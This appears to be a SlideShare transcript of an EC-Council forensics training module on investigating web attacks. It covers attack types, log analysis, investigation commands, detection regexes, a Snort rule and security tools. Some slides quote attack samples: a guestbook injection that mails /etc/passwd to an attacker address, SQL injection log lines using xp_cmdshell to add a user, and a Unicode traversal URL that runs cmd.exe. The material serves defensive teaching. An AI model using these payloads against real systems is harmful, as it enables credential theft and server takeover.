File000143
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
861
On Slideshare
861
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
7
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Module XXX – Investigating Web Attacks
  • 2. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited News: Web Application Hacks - Upping The Arms Race Source: http://www.informationweek.com/
  • 3. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited News: Mystery Web Attack Hijacks Your Clipboard Source: http://www.theregister.co.uk/
  • 4. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited News: Georgian Web Attacks are the Work of Kids Source: http://www.theinquirer.net/
  • 5. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Scenario Three Russian citizens were charged of extorting money from U.K.’s e-commerce companies on October 4, 2006. Ivan Maksakov, Alexander Petrov, and Denis Stepanov were accused of receiving $4 million from UK firms. The trio concentrated on U.K.’s Internet gambling sites collecting information about British web casinos and bookmakers’ offices using spy software designed by one of the members and then demanded ransoms from the owners of such websites by threatening them of Denial- of-Service attacks. In their six months activity, the accused attacked over 54 web servers in 30 different countries. The U.K. National Hi-Tech Crime Unit (NHTCU) and the Russian authorities investigated this case and arrested them.
  • 6. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Case Study: Word Flaw Hit With Zero-Day Attack
  • 7. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Module Objective • Indications of a Web Attack • Types of Web Attacks • Overview of Web Logs • Investigation of Web Attack • Investigation of FTP Servers • Investigation of IIS Logs • Investigation of Web Attacks in Windows-based Servers • Web page Defacement • Investigation of DNS Poisoning • Investigation of Static and Dynamic IP address • Checklist for Security to Web attacks • Tools for Web Attack Investigations This module will familiarize you with:
  • 8. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Module Flow Indications of a Web Attack Types of Web Attacks Overview of Web Logs Investigation of Web Attacks Investigation of FTP Servers Investigation of IIS Logs Investigation of Web Attacks in Windows-based Servers Web page Defacement Investigation of DNS Poisoning Investigation of Static and Dynamic IP Address Checklist for Security to Web Attacks Tools for Web Attack Investigations
  • 9. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Indications of a Web Attack Customers reporting to an organization that they are not able to access its online service A legitimate web page being redirected to an unknown website Frequent rebooting of the server Anomalies found in the log files
  • 10. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Types of Web Attacks Cross-Site Scripting (XSS) Attack Cross-Site Request Forgery (CSRF) SQL Injection Code Injection Command Injection Parameter Tampering Cookie Poisoning Buffer Overflow Cookie Snooping
  • 11. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Types of Web Attacks (cont’d) DMZ Protocol Attack Zero Day Attack Authentication Hijacking Log Tampering Web Services Attack Directory Traversal Cryptographic Interception URL Interpretation Impersonation Attack
  • 12. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Cross-Site Scripting (XSS) Cross Site Scripting (XSS or CSS) is an application layer hacking technique It occurs when a dynamic web page collects malicious data from a user and displays the input on the page without it being properly validated Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page and trick the user to execute the script on his machine in order to gather data The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems
  • 13. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Cross-Site Scripting (XSS) The regular expression below checks for attacks that may contain HTML opening and closing tags (<>) with any text inside, and their hex equivalents •/((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/ix •((%3C)|<) - check for opening angle bracket or hex equivalent •((%2F)|/)* - the forward slash for a closing tag or its hex equivalent •[a-z0-9%]+ - check for alphanumeric string inside the tag, or hex representation of these •((%3E)|>) - check for closing angle bracket or hex equivalent Regular Expression for simple CSS attack: •Alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established; •pcre:"/((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/i"; classtype:Web-application-attack; sid:9000; rev:5;) Snort signature:
  • 14. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Cross-Site Scripting (XSS) (cont’d) Regular expression for "<img src" CSS attack: •/((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^n]+((%3E) |>)/I(%3C)|<) – checks opening angled bracket or hex equivalent •(%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47) - checks the letters 'img' in varying combinations of ASCII, or upper or lower case hex equivalents •[^n]+ - checks any character other than a new line following the <img •(%3E)|>) - closing angled bracket or hex equivalent Paranoid regex for CSS attacks: •/((%3C)|<)[^n]+((%3E)|>)/I • It simply looks for the opening HTML tag, and its hex equivalent, followed by one or more characters other than the newline, and then followed by the closing tag or its hex equivalent
  • 15. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Cross-Site Request Forgery (CSRF) Attacker forces the victim to submit his form data to the victim’s web server Attacker takes an arbitrary action as soon as the victim takes preventive measures against the web site It targets the images that are generally found on Internet forums • Exploit site's trust in a user • Involve sites that rely on the user's identity • Trick a user into sending HTTP requests to a site • Involve HTTP requests that has side-effects It can:
  • 16. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Anatomy of CSRF Attack • Attacker hosts a web page with pre- populated HTML form data Step 1 • Victim browses the attacker’s HTML form Step 2 • Web page automatically submits that pre-populated form data to a site where the victim has access Step 3 • Site authenticate request (attacker’s form data) come from victims Step 4 • Attacker’s form data is accepted by the server since it was sent from a legitimate user Result
  • 17. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Pen-Testing CSRF Validation Fields • Verify that the validation field is unique for each user Test 1 • Verify that the validation field cannot be determined by other users • If an attacker can create same validation field for another user, there is no value in the validation field • Validation field must be unique for each site Test 2 • Verify that the validation field is never sent on the query string • This data could be leaked in places like HTTP referrer to attacker Test 3 • Verify request fails when validation field is missing Test 4
  • 18. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited SQL Injection Attacks SQL injection is a type of security exploit in which the attacker adds SQL code to a Web form input box to gain access to the database resources For example, in a search page, the developer may execute a query (VBScript/ASP) using the code : •Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") If a code like “blah or 1=1 –” is used as an input in the search page, it will produce the code in the ASP: •Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & blah or 1=1 -- & "'") • The above statement always comes to be true and returns the recordset
  • 19. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating SQL Injection Attacks • IDS log files • Database server log files • Web server log files Look for SQL Injection attack incidents in these locations: •12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah’ or 1=1 – •12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah’ or )1=1 (-- •12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah’ or exec master..xp_cmdshell 'net user test testpass -- The attack signature may look like:
  • 20. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited News: SQL Injection Attacks Against Databases Rise Sharply Source: http://computerworld.com/ Info-theft attempts up nearly 40-fold since beginning of year
  • 21. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Code Injection Attack Code Injection attack is similar to an SQL injection, but instead of SQL command, attackers pass other types of malicious codes like PHP script and shell commands to the web form input box of an application The purpose of the injected code is to bypass or modify the intended functionality of the program In this attack, arbitrary code is executed on the target server • Example: A web server has a “Guest book “script which receives the small messages like • It is nice site! • Attacker may insert a message “; cat /etc/passwd | mail attacker@attacker.com #” which steals the password from web server and e-mails to the attacker
  • 22. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Code Injection Attack Executable instruction detector in an Intrusion Detection System (IDS) and a series of sandbox execution environments provided by OS in the network are used to detect the code injection attacks IDS identifies the series of executable instructions and sends the suspicious packet’s payload to the executable environment matching the packet destination The proper execution environment is determined by examining the destination’s IP address of the incoming packet The payload is executed in the corresponding monitored environment and a report containing the payload’s OS resource usage is returned to the IDS If a report contains evidence of the resource ‘s usage then IDS generates the alerts, otherwise the packet is considered as non-malicious
  • 23. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Parameter Tampering Parameter tampering is a form of web attack where certain parameters in the URL entered by a user are changed during exchange between the client and the web server without the user's authorization By modifying the arguments (parameters) in the query, the attacker can navigate through the web and database servers and retrieve or modify there contents
  • 24. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Cookie Poisoning Cookie poisoning attacks involve the modification of the contents of a cookie in order to steal personal information of a user Cookies stored on the computer's hard drive maintain bits of information that allow web sites to authenticate the users’ identity, speed up transactions, monitor behavior, and personalize web services Stolen personal information is generally used for other malicious attacks such as identity theft and online frauds
  • 25. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Cookie Poisoning Attack Trace the cookies set commands issued by the web server, and store information such as cookie name, cookie value, IP address, and the session to which that cookie was assigned Intercepts each HTTP request sent to the web server, retrieves the cookie information out of it, and checks it against all stored cookies Change in the contents of a cookie determines that the attacks has occurred Attacker Attacker sends an invalid cookies to server server
  • 26. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Buffer Overflow/Cookie Snooping • Buffer overflow is the result of writing more data into a buffer than the buffer can hold • In such attacks, the extra data may contain codes designed to trigger specific actions, sending new instructions to the attacked computer that damage the user's files, change data, or disclose confidential information • Attackers attempt to overflow vulnerable backend servers with excess requests, and attackers can often execute commands directly on the compromised server Buffer Overflow: • Attacker decodes the user’s credentials, and logs on as an authorized user and gains access to the sensitive information Cookie snooping:
  • 27. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Detecting Buffer Overflow Nebula (NEtwork-based BUffer overfLow Attack detection) technique detects buffer overflow attacks based solely on the traffic observed without requiring any modifications to the end hosts Nebula uses a generalized signature that can capture all known variants of buffer overflow attacks while reducing the number of false positives to a negligible level
  • 28. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited DMZ Protocol Attack/ Zero Day Attack • Most web applications include protocols such as DNS and FTP; these protocols have many inherent vulnerabilities and are exploited to gain access to other critical applications DMZ Protocol Attack • It refers to the exploits that take advantage of a newly discovered vulnerability in a program or operating system before the software developer finds a solution for that vulnerability Zero day Attack:
  • 29. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Authentication Hijacking Authentication prompts a user to supply the credentials that allow access to the application Enforcing a consistent authentication policy between multiple and disparate applications can prove to be a real challenge An authentication hijacking can lead to theft of service, session hijacking, and user impersonation
  • 30. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Authentication Hijacking Check if the browser remembers the password (a common mistake that most of the users do while selecting ‘password remember’ options) Look if the user did not log off from the application
  • 31. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Log Tampering Logs are kept to track the usage patterns of the application Log tampering allows attackers to cover their tracks or alter web transaction records Attackers tries to delete logs, modify logs, change user information, or otherwise destroy evidence of any attack
  • 32. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Directory Traversal Direct traversal occurs when the attacker is able to browse directories and files outside the normal application access Attack exposes the directory structure of the application, and often the underlying web server and the operating system Attacker can enumerate contents, access secure or restricted pages, and gain confidential information, and locate the source’s code
  • 33. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Cryptographic Interception Using cryptography, confidential message scan be securely exchanged between two parties Encrypted traffic flow through network firewalls and IDS systems is not inspected Attacker takes advantage of a secure channel, to exploit it more efficiently than an open channel
  • 34. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited URL Interpretation and Impersonation Attack • Web server failing to parse correct URL is termed as URL interpretation • Example: Unicode or superfluous decode attacks URL Interpretation • Impersonation attack is the attack where an attacker spoofs web applications by pretending to be a legitimate user Impersonation Attack
  • 35. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Overview of Web Logs Log files come handy in detecting web attacks The source, nature, and time of the attack can be determined by analyzing log files of the compromised system Log files have HTTP status codes that are specific to the type of incidents Web servers that run on IIS or Apache are prone to log file deletion by attackers who has access to the web server as log files are stored on the web server itself
  • 36. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Web Attacks 1. • Analyze web server, ftp, and local system logs to confirm a web attack 2. • Check log file information with respect to time/time stamps, IP address, HTTP status code, and requested resource 3. • Identify the nature of the attack. Is it a DDoS attack, or an attack targeted just at you? Is someone trying to shut down your network altogether, or attempting to infiltrate individual machines? 4. • Localize the source 5. • Use your firewall and IDS logs to know where the attack is coming from (or came from!) 6. • This will help you identify whether the attack/penetration is coming from a compromised host on your network or from the outside world
  • 37. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Web Attacks (cont’d) 7. • Block the attack 8. • Once you know where the attack is coming from, you can take action to stop it 9. • If you have identified specific machines that have been compromised, pull them from the network until you can disinfect them and return them to service 10. • If an attack or attempted attack is coming from outside, block access to the network from that IP address 11. • START YOUR INVESTIGATION – from the IP address!
  • 38. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Example of FTP Compromise #nmap -0 23.3.4.5 –p 21 Starting nmap Interesting ports Port State Service 21/tcp open ftp 80/tcp open www Remote OS is Windows 2000 ftp 23.3.4.5 Connected to 23.3.4.5 Username:administrator Password: Attacker runs port scanning: The attacker connects using ftp
  • 39. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating FTP Logs The FTP logs in a Windows 2000 are stored in the directory: •C:WINDOWSsystem32LogFilesMSFTPSVC1 Screenshot of an FTP log:
  • 40. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating FTP Servers FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server Direct compromise of an FTP server can be as simple as obtaining legitimate passwords by: • Social engineering • Brute-force guessing • Network sniffing Network and FTP logs provide valuable records that can provide valuable evidence
  • 41. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating IIS Logs IIS logs all the visits in log files. The log file is located at <%systemroot%>logfiles If proxies are not used, then IP can be logged This command lists the log files: • http://victim.com/scripts/..%c0%af../..%c0%af../.. %c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%a f../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:W inntsystem32LogfilesW3SVC1.
  • 42. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Apache Logs • The Apache server saves diagnostic information and error messages that it encounters while processing requests • The default path of this file is usr/local/apache/logs/error_log in Linux • It is an important piece of evidence from the investigator’s point of view • [Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header Error log: • It contains requests processed by the Apache server • By default, access logs are stored in the common log format • The default path of this file is usr/local/apache/logs/access_log in Linux • 202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577 Access log: The Apache server has two logs, namely:
  • 43. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Web Attacks in Windows-based Servers Look for a large number of failed logon attempts or locked out accounts •C:> eventvwr.msc Run event viewer to look at logs: • Event log service stops • Windows File Protection is not active on the system • The MS Telnet Service started successfully Check if the following suspicious events have occurred:
  • 44. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Web Attacks in Windows-Based Servers (cont’d) •C:> net view 127.0.0.1 Look at file shares and ensure that each of them has a defined business purpose •C:> net session Look at who has an open session with the system •C:> net use Look at which sessions the machine has opened with other systems •C:> nbtstat –S Look at NetBIOS over TCP/IP activity •C:> netstat –na Look for unusual listening TCP and UDP ports
  • 45. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Web Attacks in Windows-based Servers (cont’d) •C:> at Look for unusual tasks on the local host such as running as user on administrator’s group as system by •C:> lusrmgr.msc Look for new accounts in the administrator’s group Look for unexpected processes by running task manager •C:> net start Look for unusual network services •C:> dir Check file space usage to look for sudden decrease in free space
  • 46. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Page Defacement • Attacker convinces the legitimate user to perform an action (i.e., giving away credentials) that may help in attack • Luring the legitimate user (insider) and gaining credentials • Exploiting implementation and design errors Attacking techniques: Unauthorized modification to a web page leads to web page defacement
  • 47. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Page Defacement (cont’d) Web page defacement requires write access privileges in web server root directory The compromise could come from any security vulnerability such as Unicode and RPC • Weak administrator password • Application misconfiguration • Server misconfigurations • Accidental permission assignments The web page defacements are the results of:
  • 48. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Defacement Using DNS Compromise The attacker can compromise the authoritative domain name server for the web server by redirecting DNS requests for a website to his defaced website • Webserver DNS entry • www.example.com 192.2.3.4 • Compromised DNS entry by the attacker • www.example.com 10.0.0.3 • Now all requests for www.example.com will be redirected to 10.0.0.3
  • 49. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating DNS Poisoning If you notice that DNS cache has been corrupted, then dump the contents of the DNS server’s cache to look for inappropriate entries On Linux systems, use the BIND command: • #ndc dumpdb • Database dump initiated You can enable DNS logging in named.conf but it will slow down the performance of the DNS server
  • 50. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Intrusion Detection Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity It can be used to determine if a computer network or server has experienced an unauthorized intrusion • Host-based Intrusion Detection Systems (HIDS) : • IDS systems that operate on a host to detect malicious activity on that host • Network -based Intrusion Detection Systems (NIDS): • IDS systems that operate on network data flows • Intrusion Prevention System (IPS): • This is a system that actively monitors a network or host for attacks and prevents those attacks from occurring Types of Intrusion Detection:
  • 51. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Strategies for Securing Web Applications • Driving ideas for detection of vulnerabilities • Fixing the earlier occurred vulnerabilities • Pen-testing the application as it avoids time for research on vulnerabilities and analyzing results • Checking for flaws in security through IDS and IPS tools • Improving awareness of good security Strategies for securing web applications: @
  • 52. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Investigating Static and Dynamic IP Addresses Static IP address of a particular host can be found with the help of tools such as NSlookup, Whois, Traceroute, ARIN, and NeoTrace The DHCP server allocates dynamic IP address to the hosts on a network The DHCP log file stores information regarding the IP address allocated to a particular host at a particular time
  • 53. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Checklist for Web Security Avoid user accounts having weak or no password Block unused open ports Check for various web attacks Test if Unicode vulnerability is prevailing Check whether IDS or IPS is deployed Look for possible intrusion areas using vulnerability scanner Test the website to check whether it can handle large loads and SSL if it is an e-commerce website Document the list of techniques, devices, policies, or necessary steps that offer security
  • 54. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Statistics 2005-2007
  • 55. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Statistics 2005-2007 (cont’d)
  • 56. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Statistics 2000-2007
  • 57. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Dotdefender http://www.applicure.com/ Dotdefender is a web application attack protection tool that blocks attacks that are manifested within the HTTP request logic such as: • SQL Injection - dotDefender intercepts and blocks attempts to inject SQL statements that corrupt or gain access to the corporate data • Proxy Takeover - dotDefender intercepts and blocks attempts to divert traffic to an unauthorized site • Cross-site Scripting - dotDefender intercepts and blocks attempts to inject malicious scripts that hijack the machines of the subsequent site visitors • Header Tampering - dotDefender identifies and blocks requests containing corrupted header data • Path Traversal - dotDefender blocks attempts to navigate through the host's internal file system • Probes - dotDefender detects and blocks attempts to ferret the system ‘s information • Known Attacks - dotDefender recognizes and blocks attacks bearing known signatures
  • 58. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Dotdefender (cont’d)
  • 59. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited AccessDiver http://www.accessdiver.com
  • 60. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited AccessDiver: Screenshot
  • 61. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Log Analyzer: Server Log Analysis http://www.w3.org/ Server log analysis analyzes server logs by changing the numeric Internet node numbers into domain names with the help of httpd-analyse.c httpd-analyse.c is the program that helps the server log analysis tool to perform its function • A version of the log file with the document name is simplified (if necessary) • IP address is turned into DNA name form Output:
  • 62. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools Analog is a program which analyzes logfiles from WWW servers that can be installed directly on a virtual server Deep Log Analyzer is an advanced web analytics solution for small and medium size websites
  • 63. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) AWStats is a free web analysis tool that works as a CGI script on the web server or from the command line that generates advanced web, streaming, ftp or mail server statistics, graphically WebLog Expert is an access log analyzer which gives the information about the site's visitors such as activity statistics, accessed files, and paths through the site, browsers
  • 64. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) AlterWind Log Analyzer Professional is unique web log analysis software Webalizer is a web server log file analysis program that produces usage statistics in HTML format for viewing with a browser
  • 65. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) eWebLog Analyzer is a web server log analyzer that gives you vital information about your website’s usage that can read log files of the most popular web servers, including Microsoft IIS, Apache, and NCSA N-Stealth 5 is a web vulnerability scanner that scans over 18000 HTTP security issues stealth HTTP Scanner writes scan results to an easy HTML report
  • 66. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) Acunetix scans website simulating numerous hacking techniques such as SQL injection, cross site scripting, and Google hacking, in order to identify vulnerabilities in the website Falcove is used by website owners to see whether their websites are hackable or vulnerable to attacks and to find vulnerabilities before attackers do Security audit report will show severity of web vulnerabilities found
  • 67. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) AppScan provides security testing throughout the application development lifecycle, which tests security assurance in the development stage Watchfire AppScan automates web application security audits to ensure the security and compliance of websites
  • 68. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) Emsa Web Monitor is a small web monitoring program that runs on the desktop and allows the user to monitor uptime status of several websites WebWatchBot is a monitoring and analysis software for websites and IP devices including Ping, HTTP, HTTPS, SMTP, POP3, FTP, Port, and DNS checks
  • 69. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) Paros is a Java based web applications security assessment tool that is used to intercept and modify all HTTP and HTTPS data between the server and the client, including cookies and from fields HP WebInspect performs web application security testing and assessment for web applications
  • 70. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) KeepNI keeps an eye on the website’s functionality and assures that your site is up and fully functional every time Wikto checks for flaws in webservers and also offers web-based vulnerability scanning
  • 71. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) Mapper maps the files, file parameters, and values of any site you wish to test and browses the site as a normal user while recording the session with Achilles (Mapper supports other proxies as well), and runs Mapper on the resulting log file N-Stalker, a web application security scanner offers a complete suite of web security assessment checks to enhance overall security of web applications against vulnerabilities and attacks
  • 72. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) Scrawlr is a HP tool that makes a website to crawl and audits it for SQL Injection vulnerabilities Exploit-Me is a suite of Firefox web application security testing tools that integrates directly with Firefox and tests vulnerabilities related to web applications
  • 73. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) WebAgain protects a website and automatically repairs the content damaged by attackers UV Uptime Website Defacement Detector detects the defacement to website
  • 74. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Tools for Locating IP Address
  • 75. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Tools for Locating IP Address Hide Real IP is the tool used to hide the IP address for anonymous Internet access, fake IP appears instead of real IP address whatismyip is a tool to recognize the real Internet IP address
  • 76. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Tools for Locating IP Address (cont’d) IP Detective Suite is an IP monitoring program that reports the changing IP address to user’s ftp site or to an e-mail address Enterprise IP - Address Manager is an application for assigning, cataloging, and maintaining IP addresses and host data for both registered and private TCP/IP addressed networks
  • 77. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Tools for Locating IP Address (cont’d) Whois Lookup is an online tool for obtaining information about any website SmartWhois is a useful network information utility that allows you to look up all the available information about an IP address, hostname, or domain
  • 78. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Tools for Locating IP Address (cont’d) ActiveWhois is a network tool to find any information about an IP address or Internet domain LanWhois is a program that helps you find out who, where, and when registered the domain or site you are interested in
  • 79. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Nslookup Nslookup is a program to query Internet domain name servers. Displays information that can be used to diagnose Domain Name System (DNS) infrastructure Helps to find additional IP addresses if authoritative DNS is known from whois MX record reveals the IP of the mail server Both Unix and Windows come with an Nslookup client Third party clients are also available – E.g. Sam Spade
  • 80. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Nslookup: Screenshot
  • 81. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Traceroute http://www.traceroute.org/ Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live It reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs As each router processes an IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator Routers with DNS entries reveal the name of routers, network affiliation, and geographic location
  • 82. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Tools for Locating IP Address: NeoTrace (Now McAfee Visual Trace) NeoTrace shows the traceroute output visually – map view, node view and IP view
  • 83. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Whois http://www.whois.net/ Whois is the client utility that communicates with WHOIS servers located around the world to obtain information about domain registration It supports IP address queries and automatically selects the appropriate Whois server for IP addresses
  • 84. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Whois Registrant: targetcompany (targetcompany-DOM) # Street Address City, Province State, Pin, Country Domain Name: targetcompany.COM Domain servers in listed order: NS1.WEBHOST.COM XXX.XXX.XXX.XXX NS2.WEBHOST.COM XXX.XXX.XXX.XXX Administrative Contact: Surname, Name (SNIDNo-ORG) targetcompany@domain.com targetcompany (targetcompany-DOM) # Street Address City, Province, State, Pin, Country Telephone: XXXXX Fax XXXXX Technical Contact: Surname, Name (SNIDNo-ORG) targetcompany@domain.com targetcompany (targetcompany-DOM) # Street Address City, Province, State, Pin, Country Telephone: XXXXX Fax XXXXX
  • 85. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited CountryWhois http://www.tamos.com/ CountryWhois is a utility for identifying the geographic location of an IP address It is similar to that of SmartWhois where the focus is on IP-to- country identification • It analyzes server logs • It checks email headers • It identifies online credit card fraud Features:
  • 86. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited CountryWhois: Screenshot
  • 87. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited IP2country http://www.ip2country.org/ IP2country identifies visitor's geographical location i.e., country, region, city and ISP, using a proprietary IP address lookup database • Real time IP geo-location detection • Redirects web pages based on geographical region • Fraud detection (credit card fraud etc.) • Web log statistics and analysis • Spam filtering Features:
  • 88. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited IP2country: Screenshot
  • 89. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited CallerIP http://www.callerippro.com/ CallerIP helps the user to see when someone has connected to your computer and can report the IP address It also runs a trace on that IP address • It offers real time connection monitoring • It identifies the country of origin for all connections made to your machine • It provides Worldwide Whois reports for any monitored connection Features:
  • 90. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited CallerIP: Screenshot 1
